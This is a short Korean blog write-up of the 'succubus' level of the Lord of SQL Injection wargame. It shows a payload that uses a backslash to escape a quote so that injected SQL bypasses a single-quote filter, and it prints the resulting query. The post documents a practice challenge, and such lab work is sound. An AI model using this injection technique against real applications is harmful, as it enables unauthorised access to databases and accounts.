티스토리 뷰
51번째 글.
1. 코드 분석
id, pw 파라미터에 대해서 single quote를 필터링하고 있다.
2. Exploit
백슬래시를 쓸 수 있으면 escape를 이용할 수 있다.
?id=\&pw= or id="admin"%23
위처럼 주게 되면
select id from prob_succubus where id='\' and pw=' or id="admin"#'
두번째 single quote가 escape되고
id의 첫 번째 single quote와 pw의 첫 번째 single quote로 감싸 지게 되어서 빨간색 부분이 id의 값으로 들어가게 된다.
'writeup > LOS' 카테고리의 다른 글
[Lord of SQL injection] nightmare (0) | 2021.07.19 |
---|---|
[Lord of SQL injection] zombie_assassin (0) | 2021.07.19 |
[Lord of SQL injection] assassin (0) | 2021.07.15 |
[Lord of SQL injection] bugbear (0) | 2021.07.13 |
[Lord of SQL injection] darknight (0) | 2021.07.12 |
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- csp bypass
- dreamhack padding oracle
- htb
- hack the box
- DreamHack
- WebHacking
- hackerfactory
- 웹해킹
- dreamhack web-alasql
- dreamhack DOM XSS
- alasql
- wargame
- webhacking.kr
- 드림핵 DOM XSS
- 해커팩토리
- 드림핵 padding oracle
- Windows Fundamentals
- xxe injection
- LFI vulnerability
- Lord of SQL injection
- php LFI
- dreamhack Relative Path Overwrite
- CSS Injection
- csp
- htb Windows Fundametals
- blind injection
- SQL Injection
- dreamhack CSS Injection
- 드림핵 Relative Path Overwrite
- 드림핵
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
글 보관함